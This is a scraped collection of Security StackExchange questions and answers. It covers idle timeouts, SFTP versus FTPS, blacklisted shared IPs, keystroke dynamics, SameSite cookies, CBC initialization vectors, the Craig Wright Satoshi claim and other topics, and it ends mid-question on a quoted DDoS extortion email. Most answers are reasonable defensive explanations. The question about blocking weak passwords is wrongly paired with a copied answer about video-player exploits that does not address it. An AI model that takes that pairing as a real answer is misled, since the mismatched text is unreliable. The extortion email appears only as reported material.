121,723 | I'm dealing with a server that isn't mine to configure. Something somewhere between me and this server kills any connection after 5 minutes if no traffic passes between the two machines. This includes active connections where a command is running on the server; specifically, I've demonstrated that this disconnection occurs using an SSH connection (running a bash command that doesn't print any output for more than 5 minutes) and a SQL database (running a SQL command that lasts more than 5 minutes). It also disconnects if I go read something and don't send any commands for 5 minutes, of course. For the SSH setting, the group responsible for the server has recommended that I enable keep alive client side. They haven't provided any suggestions for the database connections. I'm completely confused, though. What is the security benefit here? For SSH, I can bypass their settings completely from the client side, and they even recommend doing so. (The latter means there cannot even be a "security through obscurity" argument, since it won't be obscure because every user will need to know about it. Not that I think this would foil an attack even if it were obscure, especially since I found out on my own before they even recommended it.) For both, this demonstrably degrades availability. I could potentially see that disconnecting active sessions after a few hours of inactivity might be beneficial (Although the possible threats of long open sessions aren't immediately clear to me.), but every 5 minutes ? This means I can't even read a DBA.SE post while I'm working out my SQL without being disconnected. Is this as ludicrous as it sounds to me, or is there something I'm missing? Clarifications Some points have been mentioned in comments, so I'd like to clarify a little. I am able to consistently reproduce the timeout at 5 minutes. I used commands that record a timestamp server side every few seconds, and after a disconnect, the last timestamp recorded was always exactly 5 minutes after the first timestamp. So the disconnects were never sporadic. Shortly after I wrote this post, the system/network admins responded that this is indeed intentional. I quote, "More fallout from the 5 min time limit set on the F5s a few weeks back?" I'm not sure what an F5 is; some Googling suggests it's a very expensive switch, which corresponds to someone who was trying to find a workaround for my DB connections later mentioning the switch settings. (I don't believe this information invalidates any answers.) | This sounds like a good example of a security "cargo cult" . A security control has been implemented blindly without understanding the context involved or indeed implementing it correctly. Generally speaking in security the point of an idle timeout it to reduce the risk of situations where a client machine is left unattended and a malicious user gets to the machine and executes unauthorised commands on it. The balance in these timeouts tends to be one of usuability (which favours longer or no timeout) and security (which favours shorter timeouts). You can sometimes spot security cargo culting with exactly what you've mentioned which is that the operators of the system are actually helping you bypass the nominal control (in your case by recommending keep-alives be used) | {
"source": [
"https://security.stackexchange.com/questions/121723",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/46979/"
]
} |
121,759 | I had an exchange with some third party sysadmin yesterday regarding the setup of a file transfer interface between our servers. I suggested using SFTP because our application has good support for it. My interlocutor absolutely wants FTP+S (FTP+TLS) which we currently don't support and would need to develop. I argued that I did not see any real benefit in FTP+S over SFTP since both offer solid traffic encryption. SFTP is readily available and can be made even more secure with public key authentification. Last but not least, its single connection mode makes it much nicer to use behind corporate firewalls. The sysadmin almost called me an idiot, stating that SFTP works on top of SSH which is a protocol designed for administration purpose, and that opening a SSH port for any other use than administration is clearly a bad idea because it opens a broad attack vector against the host system. I am wondering if this argument is valid. There seem to be various ways to restrict a SSH session to only allow SFTP file transfer. There is the internal-sftp subsystem that comes with openSSH, where you can easily set up a chroot and disable TCP forwarding. I even heard about solutions that presumably allow users to connect via SFTP without requiring an entry in the passwd file... I do not see any clear problem with SFTP that you would not have with FTP+S, but I could be missing something? So, despite of the restrictions that you can apply to SSH, is FTP+S a better option for file transfers, security wise? | From the security they provide in theory FTPS and SFTP are similar.
In practice you have the following advantages and disadvantages: With FTPS client applications often fail to validate the certificates properly, which effectively means man in the middle is possible. With SFTP instead users simply skip information about the host key and accept anything, so the result is the same. But users and admins with more knowledge could make use of SSH keys properly and use these also for authentication which then makes SFTP much easier to use compared to using passwords. And if passwords are forbidden at all then this is also more secure because brute force password attacks are no longer possible. FTP uses dynamic ports for data connections and information about these ports is transferred in-band. This makes already plain FTP (without TLS) a nightmare when firewalls, NAT or similar is involved. With FTPS (FTP+TLS) this gets even worse because due to the encryption of the control connection helper applications on the firewall can no longer find out which ports need to be opened. This means that to pass FTPS you would need to open a wide range of ports which is bad for security(*). SFTP is much better because it uses only a single connection for control and data. FTP(S) servers often provide anonymous access and SFTP servers usually don't. Several FTP(S) servers also offer pseudo users, i.e. users taken from same database or similar which are not real users on the system. If you have proper users only anyway this does not matter. SFTP uses the SSH protocol and you have to configure the system properly to only allow SFTP access and not also SSH (terminal) access or even SSH forwarding. With FTP this is easier because FTP can do only file transfer anyway. (*) Several comments do not really believe that having a wide range of ports open is bad for security. Thus let me explain this in more detail: FTP uses separate TCP connections for data transfer. Which ports are used for these connection are dynamic and information about these gets exchanged inside the control connection. A firewall which does not know which ports are in use currently can only allow a wide port range which maybe will be used sometimes FTP. These ports need to allow access from outside to inside because in FTP passive mode the client connects to some dynamic port on the server (i.e. relevant for server side firewall) and for FTP active mode the server connects to some dynamic port on the client (relevant for client side firewall). Having a wide range of ports open for unrestricted access from outside to inside is not what somebody usually considers a restrictive firewall which protects the inside. This is more similar to having a big hole in the door where a burglar might come into the house. To work around this problem most firewalls employ "helpers" for FTP which look into the FTP control connection to figure out which ports need to be opened for the next data connection. One example is ip_conntrack_ftp for iptables. Unfortunately with FTPS the control connection is (usually) encrypted so these helpers are blind and cannot dynamically open the required ports. This means either FTP does not work or a wide range of ports need to be open all the time. | {
"source": [
"https://security.stackexchange.com/questions/121759",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/109004/"
]
} |
121,794 | I have a website which is basically a service platform. As far as I know there is no malware in my website (at least not found according to these free scanners). However, Check Point malware database definition is blocking requests to my website because it is somehow detecting a malware, whose details is something like this: Connection to IP associated by DNS trap with malicious domain. See
sk74060 for more information. Screenshot: As far as I understand, my website is being detected falsely (a false positive). How do I circumvent this? | Your website www.sheba.xyz is hosted on a shared system together with lots of others. This means that all use the same IP address, 166.62.28.88. Unfortunately, not all of the sites on this IP address play nice, which means that this IP address got reported as a cause of trouble. Unfortunately it is not only Checkpoint which reports this site as bad, but several others too; see report from cymon . There in the timeline you can also see why the IP address got put on the blacklists; namely because it was used as a target of phishing and a distribution point for malware on several domains hosted at this IP address. Which means that the best way to deal with the problem is to talk to your hosting provider so that the bad sites get removed. If this does not help, change your hosting provider to one which cares more (and maybe costs more). | {
"source": [
"https://security.stackexchange.com/questions/121794",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/24346/"
]
} |
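Whether a shared hosting IP address has landed on common DNS-based blacklists can be checked directly; a small sketch using only the standard library (the IP and the example blacklist zones are illustrative):
import socket

def is_listed(ip, zone):
    """DNSBLs answer for <reversed-ip>.<zone> only when the address is listed."""
    query = ".".join(reversed(ip.split("."))) + "." + zone
    try:
        socket.gethostbyname(query)
        return True          # any A record means "listed"
    except socket.gaierror:
        return False         # NXDOMAIN: not listed

for zone in ("zen.spamhaus.org", "bl.spamcop.net"):
    print(zone, "listed" if is_listed("166.62.28.88", zone) else "clean")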
121,824 | When I was young, and had just started out in my software-development career 20 years ago, I wrote a little bit of code on my Amiga that took a password, but also recorded (within some threshold), the speed at which each letter of a password was typed. This meant that, not only did the user have to type in the right password, they also had to time the key-presses. To test it, I'd have a rhythm in my head and could consistently re-type the password every time. However if I just typed it out regularly, or slowly, it was not accepted. I am no security expert (my programming lies in less-difficult areas, thankfully), but I just suddenly thought about that program I wrote when I was young and whether it was a viable addition to security these days, or whether it's not even worth thinking about. Tap - Taptaptap - TapTap -- Tap . | The term you are looking for is " keystroke dynamics " or "keystroke biometrics" and is an interesting and growing field. The idea is that an individual types certain keys in a certain way that does not change much over time. If you can map those dynamics, then you could, potentially, do away with passwords altogether and simply get the user to type anything . | {
"source": [
"https://security.stackexchange.com/questions/121824",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/52016/"
]
} |
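A toy sketch of the idea described in this entry - record the gaps between keystrokes while the password is typed and compare them with a stored rhythm - for a Unix terminal. The stored password, gap profile and tolerance are made-up illustrations; real keystroke-dynamics systems use far more robust statistics and many more features:
import sys, termios, time, tty

def read_with_timings(prompt="Password: "):
    """Read characters until Enter, recording the delay between consecutive keys."""
    print(prompt, end="", flush=True)
    fd = sys.stdin.fileno()
    old = termios.tcgetattr(fd)
    chars, gaps, last = [], [], None
    try:
        tty.setraw(fd)
        while True:
            ch = sys.stdin.read(1)
            now = time.monotonic()
            if ch in ("\r", "\n"):
                break
            if last is not None:
                gaps.append(now - last)
            chars.append(ch)
            last = now
    finally:
        termios.tcsetattr(fd, termios.TCSADRAIN, old)
    print()
    return "".join(chars), gaps

def rhythm_matches(gaps, profile, tolerance=0.25):
    return len(gaps) == len(profile) and all(
        abs(g - p) <= tolerance for g, p in zip(gaps, profile))

STORED_PASSWORD = "tap-tap"                       # hypothetical secret
STORED_GAPS = [0.15, 0.15, 0.6, 0.15, 0.15, 0.6]  # expected rhythm in seconds

pw, gaps = read_with_timings()
ok = pw == STORED_PASSWORD and rhythm_matches(gaps, STORED_GAPS)
print("accepted" if ok else "rejected")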
121,847 | Without even thinking about it, I typed my password into the Google search bar, but I didn't press enter. Since autocomplete is on, does that mean my password has been logged or indexed somewhere? Would it be a good idea to change my password or is that just being paranoid? | I highly doubt it. You didn't press enter, but Google will sometimes send the information to quickly present your results. This is forced over HTTPS, so your information was likely encrypted and not exposed. According to most sources Google processes on average 3.5 billion searches per day. There is no additional information to prove your query is a password. Nor is there any public way for a person to get the search queries of a particular Google user. So they would have to be an actual employee of Google. It is highly unlikely that an internal Google employee would try your search queries as passwords to your account. It might not even be possible for most standard Google employees to get such identifying information, and even then, the chance of one with such access purposely targeting you is astronomically small. Again, there is no additional context to prove it is your password. Nor is your user information submitted with your query. So even in the event of a MITM attack where someone can read your traffic, I would still rate the risk as very low, as they would also have to have your username. I am going to flat out say there is a 99.9% chance you have nothing to worry about. If you are wearing a tin foil hat or still have a nervous tic, then change your password. If you don't use this password elsewhere then you're golden, since it isn't like they could log in with an old password. Otherwise I would move on and not worry about it. Edit: @reirab made the point that it could make the query pop up in features that use your search history. I don't believe this happens if you don't press submit. But if you want to be sure, clear your search history with Google. I can't be sure this clears it from Google's servers, but it should prevent it from popping up in the auto-complete. | {
"source": [
"https://security.stackexchange.com/questions/121847",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/109087/"
]
} |
121,912 | We always hear it is safe to run unknown programs as non-root users in Linux because non-root users are sandboxed from the system level and can't change anything outside their permission scope. If need be, as the root user one can always delete a non-root user and be confident the rest of the system wasn't affected. However, isn't it possible for a low-level user to install a script with a keylogger, for example, that waits for an su - or sudo call and takes system control from there? | We always hear... Do we? I don't. Installing some untrusted program as a normal user is a bad idea with Linux the same as it is with Windows or Mac: this program has access to all your data and can delete that data, send it to somebody else, etc. Moreover, it can take screenshots, control other applications running on the same X Windows screen (even if they run as a different user), grab keystrokes (i.e. act as a keylogger),... For details see The Linux Security Circus: On GUI isolation . Apart from that, we regularly have privilege escalation bugs even in Linux - bugs which can be used by an unprivileged user to get root or even kernel-level permissions. Thus don't install any untrusted programs on any kind of system unless you are willing to compromise this system or the data stored on it. | {
"source": [
"https://security.stackexchange.com/questions/121912",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/90486/"
]
} |
121,968 | Since Whatsapp started end-to-end encryption with an option for users to verify keys, many government security agencies, like the Indian one, red-flagged such use of encryption. Yesterday the Parliament was informed by Communications and IT Minister Ravi Shankar Prasad that security/law enforcement agencies face difficulty while dealing with encrypted communications by various application service providers, including end-to-end encrypted communication messages provided by Whatsapp. However, security agencies are able to intercept these encrypted communication services through the lawful interception facilities provided by the telecom service providers. Is this technologically possible, considering it's 256-bit encryption? Can government agencies intercept end-to-end encrypted Whatsapp communication services through the lawful interception facilities provided by the telecom service providers? | It's very unlikely that any government agency would crack the encryption. They would need the key. And the only way they could get that is if Whatsapp had a backdoor or weakness in their software which allowed for such a key to be extracted. There is, as of today, no direct evidence that such a backdoor exists in Whatsapp. But, since Whatsapp is closed source, it also becomes difficult to make sure such a backdoor does not exist. However, in terms of information security, what we are interested in is a risk assessment. Considering the OP, government agencies are the parties we are being asked about. We should therefore assess that risk. Here is some relevant information regarding that: Whatsapp's parent company, Facebook, has been shown to give the NSA direct, unilateral access to their servers through something called the PRISM Program. While Facebook denies this, it has been proven by leaked documents. This does not, however, mean that the NSA can decrypt Whatsapp messages. I include this information in the risk assessment as an example of Whatsapp's owner's relationship to the NSA and privacy transparency in general. In 2013, information was released regarding: ( Source ) • NSA and GCHQ unlock encryption used to protect emails, banking and
medical records • $250m-a-year US program works covertly with tech companies to insert weaknesses into products We can absolutely not prove that this large, covert program has in fact worked with Facebook to put such a "weakness" into Whatsapp. However, this information is nevertheless relevant to our risk assessment. If such a weakness was actually implemented, it could compromise the encryption key. Though not absolutely identical, considerably similar things have indeed happened before. Here is one example regarding Skype, Microsoft and the NSA. Conclusion: It is, at present, difficult to conclude one way or the other. Whatsapp's parent company (as well as other companies) have demonstrated in the past that they are willing to give the NSA unilateral access to user data. They have also shown a willingness to lie about it . Given this, it seems difficult to take companies under the control of Facebook at their word regarding this particular subject. When we evaluate the degree of risk in regards to malware, a virus, being hacked, data loss, data theft, surveillance, etc, it is not only relevant if something is proven . It is also relevant if something is possible or even likely . While, in this particular case, there may not be sufficient grounds to say that the NSA gaining access to Whatsapp encryption keys is likely , it is definitely possible , given the history of these entities. This is something people can take into consideration when evaluating such a situation. Related reading: New Snowden Documents Detail How NSA Can Bypass Common Internet Encryption (International Business Times) Microsoft handed the NSA access to encrypted messages (The Guardian) Revealed: how US and UK spy agencies defeat internet privacy and security (The Guardian) PRISM (surveillance program) (Wikipedia) | {
"source": [
"https://security.stackexchange.com/questions/121968",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/109229/"
]
} |
121,971 | I must say, that I like this idea and it seems that it will bring a new form of protection against CSRF and XSS or at least it will reduce those attacks. So, how effective will this protection be? SameSite-cookies is a mechanism for defining how cookies should be
sent over domains. This is a security mechanism developed by Google
and is at this moment present in Chrome-dev (51.0.2704.4) . The purpose
of SameSite-cookies is [try] to prevent CSRF and XSSI-attacks. You can
read the draft here. (Source) | First, a definition from Chrome : Same-site cookies (née "First-Party-Only" (née "First-Party")) allow servers to mitigate the risk of CSRF and information leakage attacks by asserting that a particular cookie should only be sent with requests initiated from the same registrable domain. So what does this protect against? CSRF? Same-site cookies can effectively prevent CSRF attacks. Why? If you set the session cookie as same site, it will only be sent if a request emanates from your site. So a standard CSRF attack where the attacker lures the victim to the site http://malicious.com that posts a request to http://bank.com/transfer.php?amount=10000&receiver=evil_hacker will not work. Since malicious.com is not the same site as bank.com , the browser will not send the session cookie, and transfer.php will execute as if the victim was not logged in. This is very similar to how setting a X-Csrf-Token HTTP header protects you from CSRF - again there is something that is only sent if the request emanates from your domain. The same-site property turns your session cookie into a CSRF-token. So problem solved? Well, sort of. There are some caveats: This will only work for browsers that implement this feature. So far, very few do. Unless you want to throw everybody who uses a slightly older browser under the bus, you will still need to implement an old fashioned CSRF-token. If you need more fine-grained control, this will not be enough. If you run a system that displays untrusted user content, like a forum, you don't want requests originating from user posts to be treated as valid. If someone posts a link to http://myforum.com/?action=delete_everything you don't want that to delete anything just because a user clicks it. With a traditional CSRF-token, you can control exactly when it is used. With a same-site cookie, you can not. The same old caveats as for old fashioned CSRF protections still apply. If you have an XSS vulnerability, no CSRF protection in this world will save you. With that said, the same-site cookie is still a good thing that should be used together with traditional defenses as defense in depth. XSS and XSSI? The same-site cookie does nothing to protect you from ordinary XSS attacks. If a hacker manages to fool your site to echo out script from the URL on your site, it will be executed as coming from your origin (after all, it is), and thus session cookies will still be sent with all requests the injected script makes to your domain. If you read the quote in your post carefully, you will see it says XSSI with an I at the end, and not XSS. The I stands for inclusion, and XSSI is related to, but different from, XSS. Here is a good explanation of XSSI and how it differs from XSS: XSSI is a form of XSS that takes advantage of the fact that browsers don't prevent webpages from including resources like images and scripts, which are hosted on other domains and servers. [...] For example, if Bank ABC's site has a script that reads a user's private account information, a hacker could include that script in their own malicious site ( www.fraudulentbank.com ) to pull information from Bank ABC's servers whenever a client of Bank ABC visits the hacker's site. Same-site cookies protects you from XSSI, since a session cookie would not be sent with the request for the script and it would thus not return any sensitive information. However, for ordinary XSS it makes no difference. | {
"source": [
"https://security.stackexchange.com/questions/121971",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/46520/"
]
} |
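On the wire, same-site is just one more attribute on the Set-Cookie header. A minimal sketch with Python's standard http.server (the session value is a placeholder; in production this would be served over HTTPS, and only browsers that implement same-site cookies will honour the flag):
from http.server import BaseHTTPRequestHandler, HTTPServer

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        # SameSite=Strict: the browser only sends this cookie on same-site requests,
        # so cross-site requests (the CSRF case) arrive without a session.
        self.send_header("Set-Cookie",
                         "session=abc123; SameSite=Strict; Secure; HttpOnly; Path=/")
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"cookie set\n")

HTTPServer(("127.0.0.1", 8000), Handler).serve_forever()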
122,099 | I know that there is already a question related to viruses in videos, but the implication in the other question is that videos in question have been downloaded and played by media software on the target computer. The answer for that question is that yes, viruses can be embedded in videos for this purpose. But what I am instead referring to are videos viewed through browsers (which are technically media software on target computers, if you want to split hairs). Now obviously we are talking about two distinct types of video: flash and HTML5 (MP4, WebM, Ogg). Are either/both of these vulnerable to this sort of exploitation, and if so, how would it operate? Presumably the browsers are somewhat sandboxed, so we would be talking about the browser specifically being targeted, rather than the computer on which the browser is on? | but the implication in the other question is that videos in question have been downloaded and played by media software on the target computer. No it is not. The implication is that there need to be a bug in the code handling the data. For instance the ffmpeg library is used in browsers like Chrome or Firefox and it had several serious bugs in the past . And of course Flash had lots of vulnerabilities too so the problem exists for both HTML5 and Flash based media playing. Presumably the browsers are somewhat sandboxed... This is an assumption which is not necessarily true. Some browsers like Chrome or Edge are sandboxed and some like Firefox are not sandboxed (yet). In case of sandboxes it gets much harder to exploit but it is not impossible as regularly shown at Pwn2Own . | {
"source": [
"https://security.stackexchange.com/questions/122099",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/109400/"
]
} |
122,107 | We all know the basics "password rules" when a user register on a website, such as: more than 8 characters, must contain an upper case letter, must contain numbers and so on Why don't websites filter (as in not accept) well-known weak passwords such as: 123456 qwerty password What are the pros and cons of such a method and why is it not widely used? | but the implication in the other question is that videos in question have been downloaded and played by media software on the target computer. No it is not. The implication is that there need to be a bug in the code handling the data. For instance the ffmpeg library is used in browsers like Chrome or Firefox and it had several serious bugs in the past . And of course Flash had lots of vulnerabilities too so the problem exists for both HTML5 and Flash based media playing. Presumably the browsers are somewhat sandboxed... This is an assumption which is not necessarily true. Some browsers like Chrome or Edge are sandboxed and some like Firefox are not sandboxed (yet). In case of sandboxes it gets much harder to exploit but it is not impossible as regularly shown at Pwn2Own . | {
"source": [
"https://security.stackexchange.com/questions/122107",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/95611/"
]
} |
122,118 | Passwords have been a problem since the dawn of computing. They tend
to be either so complex that no one can remember them, or so obvious
that anyone could guess them. ... Some users choose to write their passwords down on paper and keep them
in their desk drawers or (even worse) stick the paper to their
computer screens. - ComputerWeekly Assuming that I'm a doors manufacturer trying to avoid passcode-based door locking systems. What other authentication techniques are there that are quicker / easier than passcodes, but don't reduce security? What are pros and cons of each one? | As a general rule to remember: Don't make it to hard to use! If it's to hard to use and you keep forgetting, all you've done is shown that you need a different security method to make your door usable. Things mentioned in this post: Private/Public authentication (keys) UUID pre-authentication (fobs) MFA(specifically 2, fob and code gen) Things mentioned in the do not use section: Biometry Security Guards alone Cameras(security theater) Security Through Obscurity (Handshakes/patterns) Roll Your Own Security Well, with a door there's always physical security like keys to look at. A lock is a private/public system where a physical public key is used to access the internal private mechanism (tumbler). When a user inserts a copy of the public key, they can gain access to the door and can modify its internal states (including unlocking, and locking it themporarily). This can be enhanced further by a timeout that causes the lock to lock itself, preventing follower. Pros Faster (put in place, turn) Easier (one action) Almost as secure as passwords (replication based on sight) User Pre-Approval (only a copy of the public key gains access, so you control in advance who gets it) Strong to interception (someone would have to run a pretty strong grab attack to gain access) Widely accepted and used (most people are already used to the system) Cons Bad users replicating keys and leaving them around (only an issue if someone can find the lock it goes too, but worth mentioning) Bad users giving copies of the key to other people who aren't supposed to have access Bad locksmiths who keep copies of the keys for nefarious reasons Loss prevention (he who has the key, has the power) As you can see above, unless you run into some bad user/ system admin lock smith situations you should be fairly safe as long as you make sure your cipher tumbler is safe against the usual brute force bump key /tamper (lock pick) tactics that exist out there and is installed with long screws and a strong door frame. Okay, let's say you want to completely do away with passwords. Now you can do something called a universally unique identifier (UUID) with pre-registration to the lock. For this you generate a long, hard-to-guess string that gets stored on a device that gets registered with the system in advance. If that generated thing was always registered in advance you can easily change it and try to restore it before you put it on the device to give to the user. Now if the user wants access, they just put the device up against a reader, which confirms the string with your security system, and they gain access! 
Pros Faster(put against square, wait for light) Easier(one action) More secure than passwords Ease of use(just put it on a small square, and you're in) Pre-registration means easy tracking UUID is so unique it can register every atom in the universe(good luck running out) Impossible to replicate without already knowing the string Cons Bad system users (users with access to the codes internally could cause issues, scripts are you friend) Loss prevention (whoever has the fob, has the power) LOSS PREVENTION Really this system is as secure as a key, but gives the extra advantage of unique "fingerprints" for the device they use to enter the building, meaning you can easily track who comes and who goes with what key. That loss-prevention con is a big one though, as then the person needs to come back, prove they are who they say they are, and you need to invalidate the old key, flag it to watch for someone who stole/found it and tries to gain bad access, and give them a new one with the hopes it won't happen too often. If a key is something that is easily captured or replicated in the part of town your door is going to be installed in, or your users are REALLY bad about loss prevention, you could instead look at pinned unique identifiers like magnetic key fobs and a time-based password delivered over text message or through a special device, which is called 2-Factor Authentication Using this technique, a user is given/makes a password to the security/lock system which is stored in a key fob. Then they register their phone with a service that will generate the other password they need to enter for them upon their request. Now when a user wants to gain access, they present their key fob and enter their password from their phone into the keypad. This provides extra security from bump keys and locksmiths because you can tie a security system into it and analyze who tried to gain illicit access in an incorrect manner so you can lock out their credentials and they have to come and get new ones at security. Pros MUCH stronger security than passwords VERY strong(the password can be good for as little as a minute if you decide to set it up that way Extra security techniques (you can instantiate rate limiting, lockouts, and credential rollover) Pre approval baked in (they have to register with you to even make their fob active) You can know the exact time frame someone logs in unlocks the door based off of the password that got confirmed (once confirmed, write and entry in your security logs) Uniqueness (each fob stores something from the user, and each text is based purely on the pre-authenticated phone number which allows for limitless unique entries in your security system) Cons Loss prevention (if someone loses their phone/fob you have to reissue a whole new credential for that part of entry) Ease of Use (you always have to have these present. If you forget one you have to go get it) Wow, that's a short list of cons with a long list of pros! Heck it even gives you remote security abilities! It's a little hard to implement though since there are a lot of systems that would have to be put in place, but that's not really a con and more of a setup cost. The "do not use" section Biometry is a cool idea, but horrible in practice. This is like fobs, but accuracy can't be guaranteed here, and it can be thwarted with something as simple as silly putty. People also change over time. It's just a bad in practice. Security Guards when used alone is also a don't-use this protocol. 
They can be overpowered, bribed, subverted, and have biological needs that may cause holes in your security during unknown times. Cameras provide NO SECURITY on their own. They're really more of an addition to security, and can't actually stop something. It's akin to security theater. Sure, you can watch it all you want, but really all you're doing is fooling yourself into thinking it's secure. Someone can still break in if a camera is there, and it's really easy to hide from. Handshakes / Security through Obscurity is another bad case of security theater. If I have to knock twice, say a phrase, knock again, and then turn the key, why would I ever use this system? I'd look like an idiot, and someone can just replicate the steps. You gain no more security here than you do with a key, and it's harder to use. Making Your Own Security Protocol/System should be avoided at ALL costs unless you're doing it for research and testing purposes and let EVERYONE bang on it to confirm just how smart you are (or bring you crashing to reality on how bad your idea was). Until it's proven safe, it's nothing more than a really bad play in the Security Theater showing. | {
"source": [
"https://security.stackexchange.com/questions/122118",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/70714/"
]
} |
122,224 | Some of the earliest Bitcoin transactions were signed with a private key most people collectively believe belonged to Satoshi Nakamoto. However, many publications propose Craig Wright may have obtained the private key from the real Nakamoto, then embarked on an elaborate hoax to impersonate Nakamoto. What are the most likely ways Craig Wright could have obtained Nakamoto's private key, necessary to carry out this hoax? Edit Apparently Bitcoin Chief Scientist Gavin Andresen is backtracking on his assertion that Mr Wright demonstrated he is in possession of private keys owned by Nakamoto. So the premise of the question is likely not true. | Wright did not obtain Nakamoto's private key. What he did provide as evidence was a signature from one of the early bitcoin transactions. However, that signature is from the blockchain and can be looked up by anyone. Wright was able to fool some people from the mainstream media who don't really understand the technical details, but the security community debunked it quite quickly. Security researcher Dan Kaminsky tweeted on May 2nd: Satoshi signed a transaction in 2009. Wright copied that specific signature and tried to pass it off as new. Also, the official Twitter account of the Bitcoin Core Project tweeted on May 2nd: There is currently no publicly available cryptographic proof that anyone in particular is Bitcoin's creator. By the way, The Economist, the original news outlet that started spreading the claim, has now published a correction. A proper proof of Nakamoto's identity would, for example, be a message reading "My real name is Craig Wright" signed with the Satoshi Nakamoto PGP key, or a new bitcoin transaction from a wallet confirmed to be owned by Satoshi Nakamoto. But so far this hasn't happened. Gavin Andresen, chief scientist at the Bitcoin Foundation, claimed to have seen such proof by Wright, but has not posted that proof publicly. Why he would make such a claim without providing any evidence whatsoever for it and expect the world to just trust his word is a mystery. Convincing people of a miracle solely by claiming very sincerely that you saw it with your own eyes might work in certain religious circles, but certainly not in the more scientifically inclined crypto community. By the way: I am the real Satoshi Nakamoto. Prove me wrong. | {
"source": [
"https://security.stackexchange.com/questions/122224",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/5372/"
]
} |
122,274 | According to Wikipedia , the initialization vector (IV) does not have to be secret, when using the CBC mode of operation. Here is the schema of CBC encryption (also from Wikipedia): What if I encrypt a plaintext file, where the first block has a known, standardized structure, such as a header? Let's imagine the following scenario: I encrypt file.pnm using AES-CBC . The pnm file has a known header structure, such as: P6
1200 800
255 Moreover, the dimensions (1200 x 800) and color mode (P6) can be guessed from the encrypted file size. If both IV and the first block of plain text are known, doesn't this compromise the whole CBC chain? | I think it's easier to split this into its component parts, and consider them as separate entities: AES and CBC. AES itself does not "basically consist of XORing together chunks of the block" - it's a much more complicated affair. Ignoring the internals of it for a moment, AES is considered secure in that without knowing the key, it's practically impossible to recover the plaintext or any information about the plaintext given only an encrypted block, or even in situations where you're given parts of the plaintext and you need to find the remainder. Without the key, AES might as well be a one-way function (and there are MAC schemes which rely upon this!). Discussing the technicalities around the security of AES and similar block ciphers is extremely involved and not something I can cover in an answer, but suffice to say that thousands of cryptographers have been looking at it for almost two decades and nobody has found anything remotely practical in terms of an attack. The diagram you posted above describes CBC. Block ciphers, such as AES, aim to be secure for encrypting one block with a secret key. The problem is that we rarely want to just encrypt one block, but rather a data stream of indeterminate length. This is where block modes, like CBC, come into play. Block modes aim to make ciphers secure for encrypting multiple blocks with the same key. The most simple block mode is ECB, which offers zero security in this regard. ECB involves independently encrypting each block with the same key, without any data fed between blocks. This leaks information in two ways: first, if you have two identical plaintext blocks, you'll get two identical ciphertext blocks if you use the same key; second, you'll get two identical ciphertext streams for two encryptions of the same message with the same key. This is a problem as it leaks information about the plaintext. CBC solves this problem by introducing a "cascading" effect. Each plaintext block is xor'ed with the previous ciphertext block, resulting in originally equal plaintext blocks no longer being equal at the encryption step, thus no longer producing equal ciphertext blocks. For the first plaintext block, there is no previous ciphertext block (you haven't encrypted anything yet), and this is where the IV comes in. Consider, for a moment, what would happen if instead of an IV we just used zeroes for the -1 th block (i..e the imaginary ciphertext block "before" the first plaintext block). While the cascade effect would make equal plaintext blocks produce different ciphertext blocks, the same entire message would cascade the same way each time, resulting in an identical ciphertext when the same full message is encrypted multiple times with the same key. The IV solves this. By picking a unique IV, no two ciphertexts are ever the same, regardless of whether the plaintext message being encrypted is the same or different each time. This should, hopefully, help you understand why the IV doesn't need to be secret. Knowing the IV doesn't get an attacker anywhere, because the IV is only there to ensure non-equality of ciphertexts. The secret key is what protects the actual data. To emphasise this even further, you don't even need the IV to decrypt all but the very first block. 
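To make this concrete, here is a minimal sketch (my own illustration, not from the original answer) using Python's cryptography package, in which the IV is generated fresh, stored in the clear next to the ciphertext, and needed only to recover the very first block:

```python
import os
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

key = os.urandom(32)   # the secret: a 256-bit AES key
iv = os.urandom(16)    # per-message IV, NOT secret

plaintext = b"P6\n1200 800\n255\n" + b"pixel data..."  # known header, secret body

# Pad to the 128-bit block size, then encrypt in CBC mode.
padder = padding.PKCS7(128).padder()
padded = padder.update(plaintext) + padder.finalize()
encryptor = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
ciphertext = encryptor.update(padded) + encryptor.finalize()

# Typical practice: ship the IV in the clear, prepended to the ciphertext.
stored = iv + ciphertext

# Decryption: anyone can read the IV, but without `key` the rest is opaque.
recovered_iv, body = stored[:16], stored[16:]
decryptor = Cipher(algorithms.AES(key), modes.CBC(recovered_iv)).decryptor()
unpadder = padding.PKCS7(128).unpadder()
recovered = unpadder.update(decryptor.update(body) + decryptor.finalize()) + unpadder.finalize()
assert recovered == plaintext
```

Knowing the IV and even the entire first plaintext block gives an attacker nothing towards recovering the key; what the IV provides is only the randomisation that keeps identical messages from producing identical ciphertexts.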
The decryption process for CBC works in reverse: decrypt a block using the secret key, then xor the result with the previous ciphertext block. For all but the very first block, you know the previous ciphertext block (you've got the ciphertext) so decryption is just a case of knowing the key. The only case where you need the IV for decryption is the very first encrypted block, where the previous ciphertext block is imaginary and replaced with the IV. | {
"source": [
"https://security.stackexchange.com/questions/122274",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/28654/"
]
} |
122,336 | I received the following email, addressed to me at an email address on my personal domain (for which I run my own mail server on a VPS): FORWARD THIS MAIL TO WHOEVER IS IMPORTANT IN YOUR COMPANY AND CAN MAKE
DECISION! We are Armada Collective. lmgtfy URL here Your network will be DDoS-ed starting 12:00 UTC on 08 May 2016 if you
don't pay protection fee - 10 Bitcoins @ some-bitcoin-address If you don't pay by 12:00 UTC on 08 May 2016, attack will start, yours
service going down permanently price to stop will increase to 20 BTC
and will go up 10 BTC for every day of attack. This is not a joke. Our attacks are extremely powerful - sometimes over 1 Tbps per second.
